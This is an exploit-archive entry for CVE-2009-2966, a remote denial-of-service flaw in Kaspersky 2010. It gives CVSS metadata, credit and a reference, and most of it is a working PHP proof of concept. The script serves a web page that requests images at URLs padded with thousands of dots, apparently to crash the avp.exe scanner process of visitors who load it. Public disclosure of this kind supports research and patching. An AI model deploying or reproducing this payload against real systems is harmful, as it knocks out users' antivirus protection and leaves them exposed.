Kaspersky 2010 remote dos (php)

Published: 2009.08.21
Credit: Maksymilian Arciemowicz
Risk: High

CWE: CWE-399
CVE: CVE-2009-2966
Local: No
Remote: Yes

CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10

Exploit range: Remote
Attack complexity: Medium
Authentication: Not required

Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

<?php
echo "<html><head><title>Kaspersky 2010 remote dos</title></head><body>
<img src=\"http://cxsecurity.com/gfx/logo.gif?explkasp\"><br>
Kaspersky 11.08.2009 02:44 CET<br>
remote denial of service<br>
check your avp.exe<br>
by Maksymilian Arciemowicz <a href=\"http://cxsecurity.com/\" alt=\"security audit\"><b>cxsecurity.com</b></a><p>";
flush();

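// Emit <img> tags whose URL path is a run of dots, from 9000 characters down to 500 in steps of 500.
for ($num = 9000; 499 < $num; $num -= 500) {
    echo "<img src=\"http://lu.cxib.net/".str_repeat(".",$num)."\">\n";
}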

echo "<! some systems have different acceptable max path len? !>
</body>
</html>";
?>

References:

http://cxsecurity.com/issue/WLB-2009080044

